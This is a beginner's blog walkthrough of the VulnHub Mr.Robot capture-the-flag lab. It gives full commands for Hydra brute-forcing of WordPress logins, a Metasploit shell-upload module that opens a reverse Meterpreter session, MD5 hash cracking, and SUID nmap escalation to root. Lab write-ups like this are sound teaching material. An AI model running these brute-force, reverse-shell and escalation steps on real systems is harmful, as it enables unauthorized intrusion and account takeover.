Home VulnHub Mr.Robot Writeup
Post
Cancel

VulnHub Mr.Robot Writeup

Posted Sep 3, 2024 Updated Sep 4, 2024
By Aaron Haymore
8 min read

VulnHub Mr.Robot Writeup - A Beginner’s Guide to Ethical Hacking

Introduction

In this blog post, I will walk you through a basic penetration testing scenario. We’ll use several tools, including Nmap, Feroxbuster, Hydra, and Metasploit. The goal is to provide a detailed and beginner-friendly explanation of each step so that you can follow along and understand what’s happening at each stage.

Recon

Identifying the Target Machine

The first task in any penetration test is to identify the IP address of the target machine. In my setup, I used Nmap, a powerful network scanning tool, to scan my subnet. This helps me find any devices connected to my network and identify their IP addresses.

1
2

┌──(kali㉿kali)-[~] 
└─$ nmap 192.168.56.0/24

This command scans the entire subnet 192.168.56.0/24, which means it looks for devices connected to the network with IP addresses ranging from 192.168.56.1 to 192.168.56.254.

The output indicated that my target machine has the IP address 192.168.56.108. It also discovered some open ports:.

1
2
3
4
5
6

Nmap scan report for 192.168.56.108
Host is up (0.00049s latency).
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https

Here, PORT refers to the network port, STATE shows whether the port is open or closed, and SERVICE identifies the type of service running on that port. For example, port 80 is open and running an HTTP service, while port 22 (SSH) is closed.

Scanning Open Ports in Detail

Now that we know which ports are open, the next step is to gather more detailed information about the services running on these ports. For this, we perform a more in-depth scan using Nmap with additional options:

1
2

┌──(kali㉿kali)-[~]
└─$ nmap 192.168.56.108 -p 22,80,443 -sVC

Here’s what the options mean:

  • -p 22,80,443: Specifies the ports to scan.
  • -sVC: Combines three options:
    • sV - Version detection: Determines the version of the services running.
    • -sC - Script scanning: Runs a set of scripts against the services to identify common vulnerabilities.

The detailed scan results showed the following:

1
2
3
4
5
6
7
8
9
10
11

PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-title: Site doesn't have a title (text/html).

This tells us that the target machine is running an Apache HTTP server on ports 80 and 443. The SSL certificate is for www.example.com, and it’s valid from 2015 to 2025.

Challenge: If you’re unfamiliar with these ports and services, I encourage you to look them up to understand their common uses and implications in a network.

Exploring the Web Service (Port 80)

Next, let’s explore the web service running on port 80. When I navigated to the webpage, it displayed a Linux terminal-like interface with some predefined commands. To see what’s really going on, I inspected the source code of the page.

Here’s a snippet of the HTML and JavaScript code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

<!doctype html>
<html class="no-js" lang="">
  <head>
    <link rel="stylesheet" href="http://192.168.56.108/css/main-600a9791.css">
    <script src="http://192.168.56.108/js/vendor/vendor-48ca455c.js.pagespeed.jm.V7Qfw6bd5C.js"></script>
    <script>
      var USER_IP='208.185.115.6';
      var BASE_URL='index.html';
      var RETURN_URL='index.html';
      var REDIRECT=false;
      window.log=function(){log.history=log.history||[];log.history.push(arguments);if(this.console){console.log(Array.prototype.slice.call(arguments));}};
    </script>
  </head>
  <body>
    <div id="app"></div>
    <script src="http://192.168.56.108/js/main-acba06a5.js.pagespeed.jm.YdSb2z1rih.js"></script>
</body>
</html>

This code revealed that the page is mostly static and doesn’t seem to do much beyond displaying a simulated terminal interface.

Directory Brute-Forcing

Since the webpage didn’t yield much information, the next step is to search for hidden directories or files on the server. For this, I used Feroxbuster, a tool that brute-forces web directories and files.

Here’s the command I used:

1
2

┌──(kali㉿kali)-[~]
└─$ feroxbuster -u http://192.168.56.108 --no-recursion
  • -u http://192.168.56.108: Specifies the target URL.
  • --no-recursion: Prevents the tool from recursively scanning directories.

The scan returned several interesting results:

1
2
3
4
5

301      GET        7l       20w      239c http://192.168.56.108/wp-admin => http://192.168.56.108/wp-admin/
302      GET        0l        0w        0c http://192.168.56.108/dashboard => http://192.168.56.108/wp-admin/
200      GET       53l      158w     2678c http://192.168.56.108/wp-login.php
200      GET       53l      158w     2678c http://192.168.56.108/wp-login
200      GET        3l        4w       41c http://192.168.56.108/robots

The robots.txt file caught my eye because it often contains URLs that the website admin doesn’t want search engines to index. Sometimes, it can reveal hidden or sensitive files.

Running curl on this file:

1
2
3
4
5

┌──(kali㉿kali)-[~]
└─$ curl http://192.168.56.108/robots                                 
User-agent: *
fsocity.dic
key-1-of-3.txt

This file listed two items: fsocity.dic, a dictionary file, and key-1-of-3.txt, which seems to be part of a Capture The Flag (CTF) challenge. I downloaded the dictionary file to use later:

1
2

┌──(kali㉿kali)-[~/vulnhub/mrRobot]
└─$ wget http://192.168.56.108/fsocity.dic

Brute-Forcing WordPress Login

Now, let’s move on to the wp-admin and wp-login.php pages. WordPress login pages are often vulnerable to username enumeration. This means you can try different usernames and see how the error messages change. If the username is correct, but the password is wrong, WordPress will tell you. Otherwise, it will just say the username is invalid.

For this, I used the fsocity.dic wordlist I downloaded earlier and a tool called Hydra to automate the brute-forcing process.

Here’s the command I used:

1
2

┌──(kali㉿kali)-[~/vulnhub/mrRobot]
└─$ hydra -L fsocity.dic -p password 192.168.56.108 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
  • -L fsocity.dic: Uses the downloaded dictionary file as a list of possible usernames.
  • -p password: Specifies a password to test against each username.
  • http-post-form: Indicates that we’re targeting a web form.

Hydra successfully identified a valid username: Elliot.

Next, I adjusted the command to brute-force the password:

1

hydra -l elliot -P fsocity.dic 192.168.56.108 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect'

Gaining Access with Metasploit

With valid WordPress credentials in hand, the next step is to use Metasploit, a penetration testing framework that simplifies exploiting vulnerabilities.

I started Metasploit with msfconsole and used a module specifically designed to exploit WordPress installations:

1

`msf6 > use exploit/unix/webapp/wp_admin_shell_upload`

I then configured the module with the following options:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 192.168.56.107
lhost => 192.168.56.107

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username Elliot
username => Elliot

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhost 192.168.56.108
rhost => 192.168.56.108

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password ER28-0652
password => ER28-0652

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set WPCHECK false
WPCHECK => false

These options specify the local host (lhost), which is my attacking machine’s IP address, the username and password that were discovered earlier, and the remote host (rhost), which is the target machine’s IP address.

Once everything was set up, I executed the exploit by typing:

1

msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

The Metasploit framework successfully exploited the target and opened a Meterpreter session:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

[*] Started reverse TCP handler on 192.168.56.107:4444 
[*] Authenticating with WordPress using Elliot:ER28-0652...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/MgTvflELdd/wFesBjAfqE.php...
[*] Sending stage (39927 bytes) to 192.168.56.108
[*] Meterpreter session 1 opened (192.168.56.107:4444 -> 192.168.56.108:55744) at 2024-09-03 11:31:23 -0400
[!] This exploit may require manual cleanup of 'wFesBjAfqE.php' on the target
[!] This exploit may require manual cleanup of 'MgTvflELdd.php' on the target
[!] This exploit may require manual cleanup of '../MgTvflELdd' on the target

meterpreter > shell

python -c 'import pty; pty.spawn("/bin/bash")'

With this command, I spawned a bash shell on the target machine, allowing me to interact directly with the system.

Escalating Privileges

Once inside the target system, I navigated to the home directory and found a user called robot. Inside the robot user’s directory, there was a file called password.raw-md5, which contained an MD5 hash of a password:

1
2

daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

MD5 is a hashing algorithm that converts data (like passwords) into a fixed-length hash value. Although MD5 is not considered secure for modern cryptography, it’s still commonly encountered in older systems.

I then used an online tool, CrackStation, to crack the MD5 hash. The password was revealed as:

1

abcdefghijklmnopqrstuvwxyz

Now that I had the password, I used it to switch to the robot user:

1
2

su robot 
Password: abcdefghijklmnopqrstuvwxyz

Root Privilege Escalation

The final step in this penetration test was to elevate privileges to gain root access. I searched for files with the SUID bit set, which allows a program to run with elevated privileges. Some files have this bit set by default, but occasionally, there are misconfigurations that can be exploited.

I used the following command to find SUID binaries:

1

find / -perm /4000 -type f 2>/tmp/2

The output showed that nmap was one of the binaries with the SUID bit set:

1

/usr/local/bin/nmap

Nmap in interactive mode can be exploited to gain a root shell. Here’s how I did it:

1
2
3
4
5
6
7

robot@linux:~$ nmap --interactive nmap 
--interactive Starting 
nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help 
nmap> !sh 
!sh 
# whoami 
root

By running !sh in interactive mode, I dropped into a shell with root privileges. From here, I had complete control over the target system.

Conclusion

This walkthrough has taken you through the basic steps of identifying a target, gathering information, exploiting vulnerabilities, and escalating privileges. Each tool used — Nmap, Feroxbuster, Hydra, and Metasploit — plays a crucial role in the penetration testing process.

Remember, this tutorial is for educational purposes only. Unauthorized access to systems without permission is illegal and unethical. Always conduct penetration testing within legal boundaries and with explicit permission.

If you’re new to this, take your time to understand each step, experiment in a controlled environment, and continue learning. Happy hacking!

VulnHub
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents